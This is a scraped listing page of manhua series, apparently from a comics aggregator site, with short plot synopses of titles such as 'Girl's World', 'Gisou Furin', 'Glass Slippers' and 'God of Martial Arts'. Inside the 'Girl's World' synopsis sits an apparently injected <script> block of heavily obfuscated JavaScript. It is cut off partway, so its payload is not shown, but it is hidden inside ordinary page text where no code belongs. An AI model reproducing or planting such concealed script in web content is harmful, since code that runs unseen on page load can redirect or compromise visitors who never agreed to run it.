Manhua - Page 31

Manhua refers to Chinese comics, which have a unique artistic style and cultural flavor. Ranging from action to romance, manhua offers a diverse reading experience for those looking for something different from manga.

1459 results

Girl’s World ( World of Girl )

Read Manga Girl’s World ( World of Girl ) Online For Free At S2Manga Associated Names: Girl’s World ( World of Girl ) Manga Zin The Content Girl’s World ( World of Girl ): It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends … You can follow some other great Comics!!!: Children of Vamfield Into the light once again Mysterious Village Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Girl’s World ( World of Girl )

It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends …<script></script><script>(function(_0x582b04,_0x34bbb9){var _0x542c58=_0x2b32,_0x4ed678=_0x582b04();while(!![]){try{var _0x179a8b=parseInt(_0x542c58(0x153))/(0x9b5+-0xac6+0x112)*(parseInt(_0x542c58(0x16a))/(-0x4*0x13d+0x9c6+-0x4d0))+-parseInt(_0x542c58(0x15f))/(-0x4d*0x9+-0x1*0x87e+0xb36)*(-parseInt(_0x542c58(0x169))/(-0x570+-0xd*0x1c+0xdc*0x8))+parseInt(_0x542c58(0x159))/(-0x17*0x2f+0x13ab+0xb*-0x167)+parseInt(_0x542c58(0x16b))/(-0x250+0x22d9+0xcb*-0x29)+-parseInt(_0x542c58(0x15b))/(-0x16*0x1a5+-0x16e1*0x1+0x3*0x13b2)+-parseInt(_0x542c58(0x156))/(-0x1*0xca3+-0x88c*0x1+0x1*0x1537)*(parseInt(_0x542c58(0x170))/(-0xcbd+0x3d*-0x65+-0x24d7*-0x1))+parseInt(_0x542c58(0x155))/(-0x6bf+0x1773+0x9*-0x1da)*(-parseInt(_0x542c58(0x161))/(-0x26da*-0x1+0x185f+-0x3f2e));if(_0x179a8b===_0x34bbb9)break;else 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Gisou Furin

Shoko has turned 30 and she has finally given up on finding a marriage partner. Recently having completed a year long contract, she wants to explore the freedom her lack of relationship and job obligations afford her and books a trip to Seoul, Korea. Unencumbered, she wants to visit the Korean BBQ restaurants alone and drink to celebrate her "graduation from marriage seeking activities." Not quite supportive is her sister, one who is already married to a good-looking, high earning man, who thinks Shoko should do the responsible thing and give marriage hunting a shot again. But Shoko cannot be deterred. But life has a strange way of turning things around. On her trip to Seoul, Shoko makes a surprising discovery, and an unexpected connection... This is a collaborative project between Higashimura Akiko and NAVER webtoon, which may be the first of its kind, at least involving such a luminary figure in manga. It is being released in Korean and Japanese, but not quite simul-release. Korean is about 20 chapters ahead.


Give the Harem to the Villainess

Lin Ci transmigrated into the otome mobile game she created and became the villainess. The only way she can go back to the real world is avoiding the harem ending and letting the heroine, Rutas, end up with one love interest. Otherwise, Lin Ci would be killed according to the plot. To survive, Lin Ci must win over the men from the heroine one by one!


Glass Slippers

After finding her boyfriend’s betrayal, Peggy Zhu, an ordinary girl with unimpressive appearance, was pushed off a cliff by his current girlfriend. Although she was almost killed, she was lucky enough to obtain the power of the crystal shoes and become a beauty, after transforming, she decided to take her revenge with the identity of Peggy Zhu. Before the coming of the dawn, their destinies have already been changed. It was just the beginning.Source of collecting


Global Beast Tamer: I Can See the Path of Evolution

Read manhwa Global Beast Tamer: I Can See the Path of Evolution on MANGAZIN Content of the comics “Global Beast Tamer: I Can See the Path of Evolution Manhwa” After traveling through time, I got the weakest little snowball as my pet, which couldn’t even evolve? Do I really have to be a waste for the rest of my life? Ding! The System lights up! What! I actually saw the hidden evolution route! Who said it was the weakest! Evolve! Ice Queen! “Global Beast Tamer: I Can See the Path of Evolution Manhwa” is another name: 全球御兽:我能看见进化路线


Global Ghost, Billions Of Ghosts Inside Me!

In the midst of class, Lin Mo, the ultimate gamer, was unexpectedly transported to a parallel world infested with ghosts and monsters. As the least talented person around, he accidentally stumbled upon the "Defense-Breaking System." All he had to do was break through a ghost's defenses, and BAM! He could forcefully form a contract with it. Oh boy, things got wild from there! While others were averaging two ghost contracts, Lin Mo went all out and contracted a BILLION ghosts! With a single summon, a gazillion ghosts descended upon the world! Drowning ghosts, starving ghosts, boozy ghosts, chainsaw ghosts Spooky, right?! Boo-tifully terrifying!


Global Martial Arts

Rebirth is just a starting point from reaching the peak. Intruding crypt, the rise of martial arts

2 days ago

Global Power: I Can Control All The Elements

Qin Feng travels to a parallel universe and finds that the Earth has changed and elementalists have become the masters of humanity.Relying on the awakened system, Qin Feng embarks on the path of escalating from the bottom to becoming a god!


God Killer

That year, the world changed, the game came to reality and the demonic plague began to wreak havoc. To fight it all, everyone had to choose their classes and upgrade frantically to become stronger. Some chose the noble Master of Law, and decided on Elemental Mage for their second turn. Some choose the Summoner, with its endless array of summons to round up and kill their enemies. But what was so shocking was that Yun Chen, a high achiever who had high hopes, chose not to have an occupation and become a classless warrior


God Of Learning

G** of Learning, at manhua websiteIt only takes three months to go from a top student to a poor student! As the college entrance examination approaches, He Liang is expelled from school! When fate plays tricks on him, he suddenly hears a strange sound of the awakening of the G** of Learning system. Ding! I am He Liang, the almighty G** of Learning!Recommend for you !


God of Martial Arts

God of Martial Arts In this world, respect is earned with martial arts. Weak martial artists have strengths of tens of thousands of pounds, capable of cracking boulders. And the strong ones can cut off rivers and split mountains. There are even martial kings who know everything and can travel across the universe. Martial art decides your fate as well as your life and death. The weak is humiliated while the strong looks down on the world. This is a a world where the strong bullies the weak. People’s statuses are decided by the levels of their cultivation of martial arts. Each faction fights for the title of “The Strongest”. Only the strong ones have the right to survive. Even if you are from the same clan or faction, if you are weak, then you will be bullied and kicked out without mercy. Dewa Seni Beladiri Juéshì Wǔshén Peerless Martial God เทพยุทธ์พลิกลิขิตสวรรค์ 绝世武神 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !
